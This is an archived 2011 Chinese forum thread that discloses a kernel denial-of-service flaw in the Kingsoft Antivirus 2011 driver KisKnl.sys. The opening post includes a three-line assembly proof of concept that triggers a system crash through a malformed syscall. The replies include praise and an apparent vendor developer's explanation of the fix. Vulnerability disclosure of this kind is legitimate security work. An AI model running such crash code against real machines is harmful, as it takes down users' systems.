本论坛为只读模式,仅供查阅,不能注册新用户,不能发帖/回帖,有问题可发邮件 xikug.xp (^) gmail.com
查看: 14187|回复: 41

金山毒霸2011 SP5.2 KisKnl.sys 2011.1.13.89 内核拒绝服务漏洞(三行代码利用) [复制链接]

Rank: 5Rank: 5

发表于 2011-1-16 14:49:59 |显示全部楼层
#
#前言: 基础知识都没搞好,就学人家Hook KiFastCallEntry, 蓝死人不偿命
#
# 金山毒霸2011 SP5.2 KisKnl.sys 2011.1.13.89 三行代码内核拒绝服务漏洞
#
# 日期: 2011-1-16
# 作者: MJ0011
# 测试平台: Windows XP SP3


细节原因:
KisKnl.sys hook了KiFastCallEntry,但是未正确处理用户堆栈,跳过了系统的MmUserProbeAddress判断直接复制堆栈。

利用代码:

__asm
{
        mov edx , 0x80000000
        mov eax , 0x101        ;id of NtTerminateProcess under Windows XP
        int 0x2e
}

Rank: 5Rank: 5

发表于 2011-1-16 14:52:07 |显示全部楼层
论坛好像对 《 号处理有问题,标题带《的话会导致无法显示《后的内容,内容带《的话会导致出现乱码

Rank: 9Rank: 9Rank: 9

发表于 2011-1-16 14:52:44 |显示全部楼层
啊。。。太威武了
悟空,退下,为师一个人就够了

Rank: 5Rank: 5

发表于 2011-1-16 14:53:42 |显示全部楼层
[quote=\"xIkUg\"]啊。。。太威武了[/quote]

看看《号的问题啊~

Rank: 9Rank: 9Rank: 9

发表于 2011-1-16 14:56:59 |显示全部楼层
[quote=\"MJ0011\"][quote=\"xIkUg\"]啊。。。太威武了[/quote]

看看《号的问题啊~ [/quote]
嗯。我检查一下
悟空,退下,为师一个人就够了

Rank: 1

发表于 2011-1-16 15:58:59 |显示全部楼层
哇塞~~顶

Rank: 2

发表于 2011-1-16 17:11:58 |显示全部楼层
这个。。。支持。。

Rank: 1

发表于 2011-1-16 17:14:11 |显示全部楼层
复制留念,激发兴趣。

Rank: 2

发表于 2011-1-16 20:08:03 |显示全部楼层
好个 内核拒绝服务漏洞

Rank: 1

发表于 2011-1-16 20:36:26 |显示全部楼层
这个不错,顶一个!

Rank: 2

发表于 2011-1-17 01:23:40 |显示全部楼层
金山那些牛,那是没有数字公司那些牛啊

Rank: 1

发表于 2011-1-17 02:17:33 |显示全部楼层
mj 太强大了

Rank: 1

发表于 2011-1-17 02:18:09 |显示全部楼层
mj 强大啊

Rank: 3Rank: 3

发表于 2011-1-17 11:15:33 |显示全部楼层
金山毒霸 残品阿

Rank: 1

发表于 2011-1-17 13:48:02 |显示全部楼层
Mark,拜MJ牛……

Rank: 1

发表于 2011-1-17 14:03:07 |显示全部楼层
楼主又开始喷人啦。。。强势围观。

Rank: 1

发表于 2011-1-17 20:22:25 |显示全部楼层
感谢这位用户热心指点。其实钩子里面有MmUserProbeAddress对用户地址的判断。多谢指正,毒霸就是有你这样的忠心用户才会越做越好。金山毒霸,一路有你!如果来珠海,奖励你个精美水杯。

Rank: 2

发表于 2011-1-17 20:34:57 |显示全部楼层
呵呵,楼上淡定。。。

Rank: 2

发表于 2011-1-17 20:51:52 |显示全部楼层
谢谢MJ的反馈,目前发现问题有三
1 extern ULONG *MmUserProbeAddress; 后引用了MmUserProbeAddress而不是*MmUserProbeAddress ,导致对0x80000000的判断总失败
2 add esp, xxx 跟POPAF 在某俩个分支重合,导致潜在崩溃
3 没检验用户地址的有效性,比如传入0也是会蓝的

已改正,欢迎继续帮助完善毒霸

Rank: 5Rank: 5

发表于 2011-1-17 22:43:18 |显示全部楼层
[quote=\"sysnap\"]谢谢MJ的反馈,目前发现问题有三
1 extern ULONG *MmUserProbeAddress; 后引用了MmUserProbeAddress而不是*MmUserProbeAddress ,导致对0x80000000的判断总失败
2 add esp, xxx 跟POPAF 在某俩个分支重合,导致潜在崩溃
3 没检验用户地址的有效性,比如传入0也是会蓝的

已改正,欢迎继续帮助完善毒霸[/quote]


没有看到升级啊。。。

围观你们怎么解决第三个问题,哈哈
您需要登录后才可以回帖 登录 | 立即加入

Archiver|手机版|第8个男人 - 论坛为只读模式,仅供查阅

GMT+8, 2019-7-22 08:36 , Processed in 0.037648 second(s), 8 queries .

Design by pvo.cn

© 2011 Pvo Inc.

回顶部